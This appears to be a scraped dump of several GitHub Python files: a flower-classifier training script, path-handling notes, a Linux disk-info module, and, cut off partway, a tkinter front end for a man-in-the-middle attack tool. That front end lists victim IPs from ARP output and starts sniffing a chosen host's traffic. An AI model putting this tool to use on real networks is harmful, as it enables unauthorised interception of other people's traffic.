---------------------------------------------------------------------------\nrandom.seed(seed) \nnp.random.seed(seed) \ntorch.manual_seed(seed)\ntorch.cuda.manual_seed_all(seed)\ntorch.backends.cudnn.deterministic = True \ntorch.backends.cudnn.benchmark = True\n# ---------------------------------------------------------------------------\n\n# ---------------------------------------------------------------------------\n# GPU\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n# ---------------------------------------------------------------------------\n\n\nmodel = models.densenet169(pretrained=True)\n\n# for param in model.parameters():\n# param.requires_grad_(False)\n\nclassifier = nn.Sequential(\n nn.Linear(1664, 5),\n nn.LogSoftmax(dim=1)\n)\nmodel.classifier = classifier\n\nprint(model)\n\n\ndataloaders, dataset_sizes = input_data.get_files(train_dir, ratio, SIZE)\n\n\ndef train_model(model, criteria, optimizer, scheduler, num_epochs, device='cuda'):\n \"\"\"\n Train the model\n :param model:\n :param criteria:\n :param optimizer:\n :param scheduler:\n :param num_epochs:\n :param device:\n :return:\n \"\"\"\n model.to(device)\n since = time.time()\n\n best_model_wts = copy.deepcopy(model.state_dict())\n best_acc = 0.0\n\n for epoch in range(num_epochs):\n print('Epoch {}/{}'.format(epoch, num_epochs - 1))\n print('-' * 10)\n\n for phase in ['train', 'valid']:\n if phase == 'train':\n scheduler.step()\n model.train()\n else:\n model.eval()\n\n running_loss = 0.0\n running_corrects = 0\n\n for inputs, labels in dataloaders[phase]:\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n optimizer.zero_grad()\n with torch.set_grad_enabled(phase == 'train'):\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n loss = criteria(outputs, labels)\n\n if phase == 'train':\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n\n epoch_loss = running_loss / dataset_sizes[phase]\n epoch_acc = running_corrects.double() / dataset_sizes[phase]\n\n print('{} Loss: {:.4f} Acc: {:.4f}'.format(\n phase, epoch_loss, epoch_acc))\n\n if phase == 'valid' and epoch_acc > best_acc:\n best_acc = epoch_acc\n best_model_wts = copy.deepcopy(model.state_dict())\n\n print()\n\n time_elapsed = time.time() - since\n print('Training complete in {:.0f}m {:.0f}s'.format(\n time_elapsed // 60, time_elapsed % 60))\n print('Best val Acc: {:4f}'.format(best_acc))\n\n model.load_state_dict(best_model_wts)\n# ------------------------------------------------------------------\n\ncriteria = nn.NLLLoss()\noptimizer = optim.Adam(model.classifier.parameters(), lr=0.001) # 1\nsched = lr_scheduler.StepLR(optimizer, step_size=5, gamma=0.1) # 4\ntrain_model(model, criteria, optimizer, sched, EPOCHS, device)\nmodel_file_name = 'flower_classifier_densenet169_1024.pth'\ntorch.save({'arch': 'densenet169',\n 'state_dict': model.state_dict()},\n model_file_name)","repo_name":"yikomoa/Flowers-Classifier","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24162350220","text":"#!/usr/bin/env python\n\n# TL;dr it's this nonsense:\n# expandvars will expand $HOME (and any/all other vars)\n# expanduser will expand ~/ and 
~username\nos.path.expandvars(os.path.expanduser(\"$HOME/pants\"))\nos.path.expandvars(os.path.expanduser(\"~/pants\"))\nos.path.expandvars(os.path.expanduser(\"~david.brady/pants\"))\n\n# Ruby:\n# dirname = File.dirname(__FILE__)\n# filename = File.join(dirname, 'relative/path/to/file')\n# abspath = File.expand_path(filename) # also expands ~ into e.g. /home/you or /Users/you\n\n# Python:\nimport os\ndirname = os.path.dirname(__file__)\nfilename = os.path.join(dirname, 'relative/path/to/file') # poor, won't work on Windows because \\\\ != /\nfilename = os.path.join(dirname, 'relative', 'path', 'to', 'file') # better\nabspath = os.path.abspath(filename)\n\nprint(\"Here, learn you a good python:\")\nprint(f\"__file__: {__file__}\")\nprint(f\"dirname: {dirname}\")\nprint(f\"filename: {filename}\")\nprint(f\"abspath: {abspath}\")\n\n# note that abspath returns a relative path (wat).\n\n# os.path.expandvars will expand $HOME but not ~, lol/sigh.\n\n# os.path.join takes a variable arg list, which should be favored over\n# a string containing linux path separators, which might not work on\n# Windows. Another nod to Python's mindset of \"your code should\n# support your user's environments\" over Ruby's \"your users must\n# support your code's requirements\". I'm thrilled to see virtualenv\n# and pip -r requirements.txt and such, but it sometimes feels like\n# people out there are favoring \"your code should spoonfeed the\n# runtime\" over \"the runtime must support your code\".\n\n# Blog this, maybe? Python recognized this problem was very hard to\n# solve and pushed it onto code authors to minimize their\n# dependencies, leaving the darker corners of the unsolvable problem\n# unaddressed beyond the occasional lament. Ruby declared this problem\n# unsolvable and threw it onto the community. It was a complete\n# nightmare, orders of magnitude worse than \"DLL Hell\". And then the\n# ruby community said \"wow this sucks, and running on an arbitrary\n# environment is an impossible problem, but fixing the environment is\n# a problem that is merely very difficult.\" So they invented\n# rvm/chruby/rbenv, and then bundler. Because Ruby places no value on\n# spoonfeeding your runtime, they place very high value on making it\n# trivial to declare, identify, and satisfy requirements. A decade\n# later, all the other langs out there are getting on board with\n# virtual envs and the ones that aren't get stuffed into a docker\n# container.\n","repo_name":"dbrady/scrapbin","sub_path":"python/require_relative.py","file_name":"require_relative.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"37"} +{"seq_id":"7032443612","text":"import subprocess\nimport os\nimport re\nfrom typing import Tuple\nfrom system import (\n System,\n Partition,\n PhysicalDisk,\n LogicalDisk,\n SystemComponent,\n DummyPartition\n)\nfrom exceptions import PyDiskInfoParseError\n\n\nclass LinuxSystem(System):\n \"\"\"This is the linux version of the System class.\n\n This class will take care of the special cases for when the module is\n running on linux systems. The availability of certain files and tools\n differ between linux distros and versions. Some info may be available\n as a regular user under some circumstances. 
But to get the module to\n find all variables, you will probably have to run in with raised\n privileges.\n\n \"\"\"\n\n def __init__(self, name: str = None) -> None:\n super().__init__(name)\n self._set_version()\n self['Type'] = 'Linux'\n\n def _set_version(self):\n \"\"\"The distribution version of the system.\n\n There is no 'one' way to get version information about a linux distro.\n Kernel version would be easier, but is not really of any interest in\n the scope of the pydiskinfo module. So we do as best we can, and\n default to kernel version if all else fails.\"\"\"\n self['Version'] = f'{os.uname()[0]} {os.uname()[2]}'\n\n def _get_block_devices(self) -> Tuple[Tuple[str]]:\n block_devices = []\n try:\n with open('/proc/partitions', 'r') as proc_partitions:\n for each_line in proc_partitions:\n match = re.match(\n r'\\s*(\\d+)\\s+(\\d+)\\s+(\\d+)\\s+(\\S+)\\s*',\n each_line\n )\n if match:\n block_devices.append(match.group(1, 2, 3, 4))\n except FileNotFoundError as err:\n raise PyDiskInfoParseError(\n 'Missing /proc/partitions. Giving up parsing.'\n ) from err\n return tuple(block_devices)\n\n def _get_scsi_hard_drives(\n self,\n block_devices\n ) -> Tuple['LinuxPhysicalDisk']:\n linux_physical_disks = []\n for each_device in block_devices:\n if each_device[0] == '8' and (int(each_device[1]) % 16) == 0:\n linux_physical_disks.append(\n LinuxPhysicalDisk(\n self,\n int(each_device[0]),\n int(each_device[1]),\n int(each_device[2]),\n each_device[3]\n )\n )\n self._set_media_type(linux_physical_disks, 'SATA/SCSI HD')\n return tuple(linux_physical_disks)\n\n def _set_media_type(\n self,\n physical_disks: Tuple['LinuxPhysicalDisk'],\n meida_type: str\n ) -> None:\n for each_disk in physical_disks:\n each_disk.set_media_type(meida_type)\n\n def _get_partitions_from_block_devices(\n self,\n block_devices: Tuple[Tuple[str]],\n physical_disks: list['LinuxPhysicalDisk']\n ) -> Tuple['LinuxPartition']:\n partitions = []\n for each_device in block_devices:\n if int(each_device[1]) % 16 > 0:\n disk = None\n for each_disk in physical_disks:\n if str(\n each_disk._major_number\n ) == each_device[0] and each_disk._minor_number < int(\n each_device[1]\n ) and each_disk._minor_number + 16 > int(each_device[1]):\n disk = each_disk\n break\n partition = LinuxPartition(\n disk,\n int(each_device[0]),\n int(each_device[1]),\n int(each_device[2]),\n each_device[3]\n )\n if disk:\n disk.add_partition(partition)\n partitions.append(partition)\n return tuple(partitions)\n\n def _parse_system(self) -> None:\n block_devices = self._get_block_devices()\n self._physical_disks.extend(self._get_scsi_hard_drives(block_devices))\n # for each_device in block_devices:\n # # handeling metadisk (raid) devices\n # if each_device[0] == '9':\n # # read from /proc/mdstat\n # self._physical_disks.append(\n # LinuxPhysicalDisk(\n # self,\n # int(each_device[0]),\n # int(each_device[1]),\n # int(each_device[2]),\n # each_device[3]\n # )\n # )\n self._partitions.extend(\n self._get_partitions_from_block_devices(\n block_devices,\n self._physical_disks\n )\n )\n logical_disks = []\n try:\n mounts = subprocess.run(\n (\n 'df',\n '--output=source,fstype,size,avail,target',\n '--local',\n '--block-size=1'\n ),\n capture_output=True,\n text=True\n )\n for each_line in mounts.stdout.split('\\n'):\n match = re.search(\n r'(.*\\w)\\s+(\\w+)\\s+(\\d+)\\s+(\\d+)\\s+(\\/.*)',\n each_line\n )\n if match:\n logical_disks.append(match.groups())\n except OSError as err:\n raise PyDiskInfoParseError('Cant find the \"df\" command.') from 
err\n        for each_logical_disk in logical_disks:\n            logical_disk = LinuxLogicalDisk(\n                self,\n                each_logical_disk[4],\n                each_logical_disk[1],\n                int(each_logical_disk[2]),\n                int(each_logical_disk[3])\n            )\n            for each_partition in self._partitions:\n                if each_partition['Path'] == each_logical_disk[0]:\n                    checked_logical_disk = self._add_logical_disk(logical_disk)\n                    each_partition.add_logical_disk(checked_logical_disk)\n                    checked_logical_disk.add_partition(each_partition)\n            for each_disk in self._physical_disks:\n                if each_disk['Path'] == each_logical_disk[0]:\n                    checked_logical_disk = self._add_logical_disk(logical_disk)\n                    dummy_partition = DummyPartition(\n                        each_disk,\n                        checked_logical_disk\n                    )\n                    self._partitions.append(dummy_partition)\n                    each_disk.add_partition(dummy_partition)\n                    checked_logical_disk.add_partition(dummy_partition)\n\n    def _add_logical_disk(self, logical_disk: 'LogicalDisk') -> 'LogicalDisk':\n        return_logical_disk = None\n        for each_logical_disk in self._logical_disks:\n            if each_logical_disk['Name'] == logical_disk['Name']:\n                return_logical_disk = each_logical_disk\n                break\n        if not return_logical_disk:\n            return_logical_disk = logical_disk\n            self._logical_disks.append(logical_disk)\n        return return_logical_disk\n\n\nclass LinuxPhysicalDisk(PhysicalDisk):\n    def __init__(\n        self,\n        system: SystemComponent,\n        major_number: int,\n        minor_number: int,\n        size_in_sectors: int,\n        device_name: str\n    ) -> None:\n        super().__init__(system)\n        self._major_number = major_number\n        self._minor_number = minor_number\n        self._set_name_and_path(device_name)\n        self._set_size_and_sectors(size_in_sectors)\n\n    def _set_size_and_sectors(\n        self,\n        sectors: int,\n        sector_size: int = 512\n    ) -> None:\n        \"\"\"Sets number of sectors, sector size, and size in bytes.\"\"\"\n        self['Sectors'] = sectors\n        self['Bytes per Sector'] = sector_size\n        self['Size'] = sectors * sector_size\n\n    def _set_name_and_path(self, name):\n        self['Name'] = name\n        self['Path'] = f'/dev/{name}'\n\n    def set_media_type(self, media_type: str) -> None:\n        self['Media'] = media_type\n\n\nclass LinuxPartition(Partition):\n    def __init__(\n        self,\n        disk: 'PhysicalDisk',\n        major_number: int,\n        minor_number: int,\n        size_in_sectors: int,\n        device_name: str\n    ) -> None:\n        super().__init__(disk)\n        self._major_number = major_number\n        self._minor_number = minor_number\n        self._set_device_id_and_path(device_name)\n        self._set_blocks_and_size(size_in_sectors)\n\n    def _set_blocks_and_size(\n        self,\n        sectors: int,\n        sector_size: int = 512\n    ) -> None:\n        self['Number of Blocks'] = sectors\n        self['Size'] = sectors * sector_size\n        self['Blocksize'] = sector_size\n\n    def _set_device_id_and_path(self, name: str) -> None:\n        self['Device I.D.'] = name\n        self['Path'] = f'/dev/{name}'\n\n\nclass LinuxLogicalDisk(LogicalDisk):\n    def __init__(\n        self,\n        system: object,\n        path: str,\n        file_system: str,\n        size: int,\n        free_space: int\n    ) -> None:\n        super().__init__(system)\n        self._set_path_device_id_and_name(path)\n        self['Filesystem'] = file_system\n        self['Size'] = size\n        self['Free Space'] = free_space\n\n    def _set_path_device_id_and_name(self, path):\n        self['Path'] = path\n        self['Device I.D.'] = path\n        self['Name'] = path\n","repo_name":"glarrrgh/pydiskinfo","sub_path":"linux_system.py","file_name":"linux_system.py","file_ext":"py","file_size_in_byte":9529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32262623415","text":"from tkinter import *\nfrom tkinter import ttk\nfrom typing import Tuple\n\nfrom PIL import ImageTk, 
Image\nfrom encrypting.users import Users\nimport subprocess\nimport re\nfrom mitm.final_run import FinalRun\n\nCMDIP_REGEX = \"\\s((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))\\s\"\nSUBNET_REG = \"Subnet\\sMask\\s[\\.|\\s]+:\\s((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))\"\nGATEWAY_REG = \"Default\\sGateway\\s[\\.|\\s]+:\\s((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))\"\nGATEWAYIP = ''\nIP_LIST = []\nVICTIM_IP = ''\n\ndef find_mask():\n \"\"\"\n gets the ipconfig command info from the cmd, and uses re to find the ip numbers which matches the 255 areas in the\n sbnet mask\n :return: gateway ip, ip subnet mask\n \"\"\"\n text = str(subprocess.check_output(\"cmd /c ipconfig\", stderr=subprocess.STDOUT, shell=True))\n subnet_mask = re.search(SUBNET_REG, text).group(1)\n gateway = re.search(GATEWAY_REG, text).group(1)\n subsplit = subnet_mask.split(\".\")\n gatesplit = gateway.split(\".\")\n check_ip = []\n for i in range(0,4):\n if subsplit[i] == \"255\":\n check_ip.append(gatesplit[i])\n return check_ip, gateway\n\ndef clean_ip_list(ips, mask):\n \"\"\"\n :param ips: the list on current avalable ip addresses in the network\n :param mask: the subnet mask\n :return: a list of ips which matches the subnet mask, without the ip of the attacking machine\n \"\"\"\n final_list = []\n for ip in ips:\n x = ip.split(\".\")\n flag = True\n for i in range(0,len(mask)):\n if x[i] != mask[i]:\n flag = False\n if flag:\n final_list.append(\".\".join(x))\n del final_list[0]\n return final_list\n\ndef avalable_ip_adresses():\n \"\"\"\n gets all the ip adresses in the network using arp -a in the cmd, then uses the helping functions to filter the ips\n which are attackable\n :return: a string with all the avalable ip adresses to attack\n \"\"\"\n global IP_LIST, GATEWAYIP\n ip_addresses = str(subprocess.check_output(\"cmd /c arp -a\", stderr=subprocess.STDOUT, shell=True))\n IP_LIST = re.findall(CMDIP_REGEX, ip_addresses)\n ip_subnet, GATEWAYIP = find_mask()\n IP_LIST.remove(GATEWAYIP)\n IP_LIST = clean_ip_list(IP_LIST, ip_subnet)\n IP_LIST.insert(0, \"Available ip addresses\")\n IP_LIST.append(\"\\ngateway ip: \\n\" + str(GATEWAYIP))\n return \"\\n\".join(IP_LIST)\n\nINVALID_LIST = [\"'\", \"username\", \"password\"]\nBG_COLOR1 = \"#4275A8\"\nIP_REGEX = \"^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$\"\nAVAILABLE_IPS = avalable_ip_adresses()\n\n\nclass ProjectGui:\n def __init__(self):\n self.root = Tk()\n self.my_canvas = Canvas(self.root, width=485, height=355, bd=0, highlightthickness=0)\n self.reg_button = Button(self.root, text=\"registry\", font=(\"Clibri\", 14), width=7, fg=\"black\", bg=\"#b29b8f\")\n self.log_button = Button(self.root, text=\"login\", font=(\"Clibri\", 14), width=7, fg=\"black\", bg=\"#b29b8f\",\n command=self.login_screen)\n self.back_button = Button(self.root, text=\"back\", font=(\"Clibri\", 10), width=5, fg=\"white\", bg=\"#2a3e5a\",\n command=self.login_registry_screen)\n self.un_entry = Entry(self.root, font=(\"Clibri\", 18), width=14, fg=\"black\", bg=\"white\", bd=0)\n self.pw_entry = Entry(self.root, font=(\"Clibri\", 18), width=14, fg=\"black\", bg=\"white\", bd=0)\n self.users = Users()\n self.login_btn = Button(self.root, text=\"login\", font=(\"Clibri\", 12), width=7, fg=\"white\", bg=\"#42536e\",\n command=self.handle_info_login)\n self.textid = 0\n self.start_btn = Button(self.root, 
text=\"start\", font=(\"Clibri\", 10), width=5, fg=\"white\", bg=\"white\",\n command=self.check_ip)\n self.victimip_entry = Entry(self.root, font=(\"Clibri\", 18), width=14, fg=\"black\", bg=\"white\", bd=0)\n self.gatewayip_entry = Entry(self.root, font=(\"Clibri\", 18), width=14, fg=\"black\", bg=\"white\", bd=0)\n self.lable1 = Label(self.root, text=\"Invalid input.\", font=(\"Clibri\", 20), bg=BG_COLOR1)\n self.lable2 = Label(self.root, text=\"Invalid input.\", font=(\"Clibri\", 20), bg=BG_COLOR1)\n self.lable3 = Label(self.root, text=\"Invalid input.\", font=(\"Clibri\", 20), bg=BG_COLOR1)\n self.lable4 = Label(self.root, text=\"Invalid input.\", font=(\"Clibri\", 20), bg=BG_COLOR1)\n self.lable5 = Label(self.root, text=\"Invalid input.\", font=(\"Clibri\", 20), bg=BG_COLOR1)\n self.var = IntVar()\n self.var.set(1)\n self.read_b = Radiobutton(self.root, text=\"Read data\", font=(\"Clibri\", 20), variable=self.var, value=1)\n self.change_b = Radiobutton(self.root, text=\"Edit data\", font=(\"Clibri\", 20), variable=self.var, value=2)\n self.tree_frame = Frame(self.root)\n self.tree_scroll = Scrollbar(self.tree_frame)\n self.my_tree = ttk.Treeview(self.tree_frame, yscrollcommand=self.tree_scroll.set, selectmode=\"extended\")\n self.data_frame = LabelFrame(self.root, text=\"packet information\", fg=\"black\", bg=\"#75BFD7\")\n self.id_lable = Label(self.data_frame, text=\"Packet ID\", bg=\"#75BFD7\")\n self.button_frame = LabelFrame(self.root, text=\"Commands\", bg=\"#75BFD7\")\n\n\n def check_validation(self, pw, un):\n \"\"\"\n :param pw: password\n :param un: username\n :return: true (valid) if pw & un are 8 chars or more and are safe from sql injection\n \"\"\"\n for i in INVALID_LIST:\n if i in pw or i in un or len(pw)<8 or len(un)<8:\n return False\n return True\n\n\n def login_registry_screen(self):\n \"\"\"\n runs the first screen, in which you choose to register or log in\n \"\"\"\n self.my_canvas.destroy()\n\n self.root.geometry(\"485x355+480+200\")\n self.root.title(\"MITM entry screen\")\n icon = PhotoImage(file=r\"C:\\Users\\lirik\\Downloads\\icon.png\")\n self.root.iconphoto(False, icon)\n self.root.resizable(height=False, width=False)\n\n bg = ImageTk.PhotoImage(file=r\"C:\\Cyber\\hacker2.webp\")\n\n self.my_canvas = Canvas(self.root, width=485, height=355, bd=0, highlightthickness=0)\n self.my_canvas.pack(fill=\"both\", expand=True)\n self.my_canvas.create_image(0, 0, image=bg, anchor=\"nw\")\n\n self.reg_button = Button(self.root, text=\"registry\", font=(\"Clibri\", 14), width=7, fg=\"black\", bg=\"#b29b8f\",\n command=self.reg_screen)\n self.log_button = Button(self.root, text=\"login\", font=(\"Clibri\", 14), width=7, fg=\"black\", bg=\"#b29b8f\",\n command=self.login_screen)\n\n reg_button_window = self.my_canvas.create_window(195, 300, anchor=\"nw\", window=self.reg_button)\n log_button_window = self.my_canvas.create_window(195, 250, anchor=\"nw\", window=self.log_button)\n\n self.root.mainloop()\n try:\n if self.attacker:\n self.attacker.stop()\n self.attacker.sniffer.set_on('stop')\n exit(0)\n except AttributeError:\n exit(0)\n\n def entry_clear_un(self, e):\n \"\"\"\n clears the entry boxes in the first screen\n \"\"\"\n if self.un_entry.get() == \"username\" or self.pw_entry.get() == \"password\":\n self.un_entry.delete(0, END)\n self.pw_entry.delete(0, END)\n self.pw_entry.config(show=\"*\")\n\n def login_screen(self):\n \"\"\"\n opens the login screen and checks if the information is right. 
if so, opens the main screen\n        \"\"\"\n        self.reg_button.destroy()\n        self.log_button.destroy()\n\n        self.root.title(\"MITM login screen\")\n\n        self.un_entry = Entry(self.root, font=(\"Clibri\", 18), width=14, fg=\"black\", bg=\"white\", bd=0)\n        self.pw_entry = Entry(self.root, font=(\"Clibri\", 18), width=14, fg=\"black\", bg=\"white\", bd=0)\n\n        self.un_entry.insert(0, \"username\")\n        self.pw_entry.insert(0, \"password\")\n\n        un_window = self.my_canvas.create_window(145, 240, anchor=\"nw\", window=self.un_entry)\n        pw_window = self.my_canvas.create_window(145, 290, anchor=\"nw\", window=self.pw_entry)\n\n        self.un_entry.bind(\"<Button-1>\", self.entry_clear_un)\n        self.pw_entry.bind(\"<Button-1>\", self.entry_clear_un)\n\n        self.root.bind('<Return>', self.handle_info_login)\n        self.login_btn = Button(self.root, text=\"login\", font=(\"Clibri\", 12), width=7, fg=\"white\", bg=\"#42536e\",\n                                command=self.handle_info_login)\n        self.back_button = Button(self.root, text=\"back\", font=(\"Clibri\", 10), width=5, fg=\"white\", bg=\"#2a3e5a\",\n                                  command=self.login_registry_screen)\n\n        log_button_window = self.my_canvas.create_window(380, 292, anchor=\"nw\", window=self.login_btn)\n        back_button_window = self.my_canvas.create_window(10, 10, anchor=\"nw\", window=self.back_button)\n\n    def handle_info_login(self, e=None):\n        \"\"\"\n        gets pw and un from login screen and checks if the user exists. if so, opens the main screen.\n        \"\"\"\n        pw = str(self.pw_entry.get())\n        un = str(self.un_entry.get())\n        valid = self.check_validation(pw, un)\n        if valid:\n            ans = self.users.check_user(un, pw)\n            if ans:\n                self.ip_choosing_screen()\n            elif not ans:\n                self.my_canvas.delete(self.textid)\n                self.textid = self.my_canvas.create_text(90, 100, text=\"Username or password are incorrect.\",\n                                                         font=(\"Clibri bald\", 12),\n                                                         fill=\"white\", width=160)\n                # wrong password\n        else:\n            self.my_canvas.delete(self.textid)\n            self.textid = self.my_canvas.create_text(90, 100, text=\"Invalid input\", font=(\"Clibri bald\", 12),\n                                                     fill=\"white\", width=160)\n\n    def reg_screen(self):\n        \"\"\"\n        opens the registry screen and checks if the information is right.\n        \"\"\"\n\n        self.reg_button.destroy()\n        self.log_button.destroy()\n\n        self.root.title(\"MITM registry screen\")\n\n        self.un_entry = Entry(self.root, font=(\"Clibri\", 18), width=14, fg=\"black\", bg=\"white\", bd=0)\n        self.pw_entry = Entry(self.root, font=(\"Clibri\", 18), width=14, fg=\"black\", bg=\"white\", bd=0)\n\n        self.un_entry.insert(0, \"username\")\n        self.pw_entry.insert(0, \"password\")\n\n        un_window = self.my_canvas.create_window(145, 240, anchor=\"nw\", window=self.un_entry)\n        pw_window = self.my_canvas.create_window(145, 290, anchor=\"nw\", window=self.pw_entry)\n\n        self.un_entry.bind(\"<Button-1>\", self.entry_clear_un)\n        self.pw_entry.bind(\"<Button-1>\", self.entry_clear_un)\n\n        self.root.bind('<Return>', self.conf_screen)\n        self.log_button = Button(self.root, text=\"register\", font=(\"Clibri\", 12), width=7, fg=\"white\", bg=\"#42536e\",\n                                 command=self.conf_screen)\n        self.back_button = Button(self.root, text=\"back\", font=(\"Clibri\", 10), width=5, fg=\"white\", bg=\"#2a3e5a\",\n                                  command=self.login_registry_screen)\n\n        log_button_window = self.my_canvas.create_window(380, 292, anchor=\"nw\", window=self.log_button)\n        back_button_window = self.my_canvas.create_window(10, 10, anchor=\"nw\", window=self.back_button)\n\n        self.textid = self.my_canvas.create_text(90, 100,\n                                                 text=\"Welcome! please enter your desired username and password (at least 8 chars). 
\"\n \"After the registry, log in.\", font=(\"Clibri bald\", 12),\n fill=\"white\",\n width=160)\n\n def conf_screen(self, e=None):\n \"\"\"\n gets the new pw and un the user inserted. checks if they are valid, or exsits. if so, it requiers them to fill\n again. otherwise, its inserting the new user to the db.\n :return:\n \"\"\"\n pw = str(self.pw_entry.get())\n un = str(self.un_entry.get())\n if not self.check_validation(pw,un):\n self.my_canvas.delete(self.textid)\n self.textid = self.my_canvas.create_text(90, 100, text=\"Invalid input\", font=(\"Clibri bald\", 12),\n fill=\"white\", width=160)\n elif self.users.insert_user(un, pw) == \"exists\":\n self.my_canvas.delete(self.textid)\n self.textid = self.my_canvas.create_text(90, 100, text=\"Invalid input\", font=(\"Clibri bald\", 12),\n fill=\"white\", width=160)\n else:\n self.my_canvas.delete(self.textid)\n self.un_entry.destroy()\n self.pw_entry.destroy()\n self.log_button.destroy()\n self.my_canvas.create_text(90, 100, text=\"Registry completed successfully! go back and log in. \",\n font=(\"Clibri bald\", 12), fill=\"white\", width=160)\n\n def ip_choosing_screen(self):\n \"\"\"\n opens a screen in which you can choose the attacked ip address\n \"\"\"\n self.my_canvas.destroy()\n self.tree_frame.destroy()\n self.data_frame.destroy()\n self.button_frame.destroy()\n\n self.root.geometry(\"900x500+290+150\")\n self.root.title(\"MITM main screen\")\n self.root.configure(bg=BG_COLOR1)\n icon = PhotoImage(file=r\"C:\\Users\\lirik\\Downloads\\icon.png\")\n self.root.iconphoto(False, icon)\n # self.root.resizable(height=True, width=True)\n\n self.start_btn = Button(self.root, text=\"start\", font=(\"Clibri\", 18), width=5, fg=\"black\", bg=\"white\",\n command=self.check_ip)\n self.root.bind('<Return>', self.check_ip)\n\n\n self.start_btn.pack()\n self.start_btn.place(relx=0.45, rely=0.8, anchor=\"nw\")\n\n self.victimip_entry = Entry(self.root, font=(\"Clibri\", 20), width=14, fg=\"black\", bg=\"white\", bd=0)\n self.gatewayip_entry = Entry(self.root, font=(\"Clibri\", 20), width=14, fg=\"black\", bg=\"white\", bd=0)\n\n self.victimip_entry.pack()\n self.gatewayip_entry.pack()\n self.victimip_entry.place(relx=0.45, rely=0.3, anchor=\"nw\")\n self.gatewayip_entry.place(relx=0.45, rely=0.5, anchor=\"nw\")\n\n self.lable1 = Label(self.root, text=\"Please enter victim's ip and gateway ip\", font=(\"Clibri\", 20),\n bg=BG_COLOR1)\n self.lable2 = Label(self.root, text=\"Victim ip\", font=(\"Clibri\", 20), bg=BG_COLOR1)\n self.lable3 = Label(self.root, text=\"Gateway ip\", font=(\"Clibri\", 20), bg=BG_COLOR1)\n self.lable4 = Label(self.root, text=AVAILABLE_IPS, font=(\"Clibri\", 12), bg=BG_COLOR1)\n\n self.lable2.place(relx=0.25, rely=0.3, anchor=\"nw\")\n self.lable3.place(relx=0.25, rely=0.5, anchor=\"nw\")\n self.lable1.place(relx=0.23, rely=0.1, anchor=\"nw\")\n self.lable4.place(relx=0.78, rely=0.18, anchor=\"nw\")\n\n def is_ip(self, addr):\n \"\"\"\n :param addr: ip address\n :return: if the address is ip or not\n \"\"\"\n if re.search(IP_REGEX, addr):\n return True\n else:\n return False\n\n def is_in_list(self, ip, lst):\n \"\"\"\n :param ip: ip address\n :param lst: avalable ip list\n :return: if it is in the list or not\n \"\"\"\n for i in lst:\n print(i)\n if ip == i:\n return True\n return False\n\n def check_ip(self, e=None):\n \"\"\"\n checks if the ip is avalable, if so it starts the attack\n :return: if invalid, prints a massage to the screen\n \"\"\"\n global VICTIM_IP\n VICTIM_IP = str(self.victimip_entry.get())\n gwip = 
str(self.gatewayip_entry.get())\n        if self.is_ip(VICTIM_IP) and self.is_ip(gwip) and self.is_in_list(VICTIM_IP, IP_LIST) and gwip == GATEWAYIP:\n            self.sniffing_screen()\n        else:\n            self.lable5 = Label(self.root, text=\"Invalid input.\", font=(\"Clibri\", 20), bg=BG_COLOR1)\n            self.lable5.place(relx=0.1, rely=0.4, anchor=\"nw\")\n\n    def choose_action(self, value):\n        if value == 1:\n            self.sniffing_screen()\n        elif value == 2:\n            self.get_db_file()\n\n    def action_screen(self):\n        self.lable5.destroy()\n        self.lable1.destroy()\n        self.lable2.destroy()\n        self.lable3.destroy()\n        self.lable4.destroy()\n        self.victimip_entry.destroy()\n        self.gatewayip_entry.destroy()\n        self.start_btn.destroy()\n\n        self.read_b = Radiobutton(self.root, text=\"Read data\", font=(\"Clibri\", 20), variable=self.var, value=1, bg=BG_COLOR1)\n        self.change_b = Radiobutton(self.root, text=\"Download current db\", font=(\"Clibri\", 20), variable=self.var, value=2, bg=BG_COLOR1)\n\n        self.root.bind('<Return>', lambda e: self.choose_action(self.var.get()))\n        self.start_btn = Button(self.root, text=\"start\", font=(\"Clibri\", 18), width=5, fg=\"black\", bg=\"white\",\n                                command=lambda: self.choose_action(self.var.get()))\n\n        self.lable1 = Label(self.root, text=\"What would you like to do?\", font=(\"Clibri\", 20),\n                            bg=BG_COLOR1)\n\n        self.lable1.place(relx=0.3, rely=0.1, anchor=\"nw\")\n        self.read_b.place(relx=0.40, rely=0.3, anchor=\"nw\")\n        self.change_b.place(relx=0.4, rely=0.5, anchor=\"nw\")\n        self.start_btn.place(relx=0.42, rely=0.8, anchor=\"nw\")\n\n    def get_db_file(self):\n        pass\n\n    def sniffing_screen(self):\n        \"\"\"\n        opens the main screen in which the user can watch and control the information\n        \"\"\"\n        self.root.geometry(\"1000x500+290+150\")\n        self.lable1.destroy()\n        self.read_b.destroy()\n        self.change_b.destroy()\n        self.start_btn.destroy()\n        self.root.configure(bg=\"#75BFD7\")\n\n        style = ttk.Style()\n        style.theme_use('default')\n        style.configure(\"Treeview\", background=\"#D3D3D3\", foreground=\"white\", rowheight=25, fieldbackground= \"#D3D3D3\")\n        style.map(\"Treeview\", background=[('selected', \"#347083\")])\n\n        self.tree_frame = Frame(self.root)\n        self.tree_frame.pack(pady=10)\n        self.tree_scroll = Scrollbar(self.tree_frame)\n        self.tree_scroll.pack(side=RIGHT, fill=Y)\n\n        self.my_tree = ttk.Treeview(self.tree_frame, 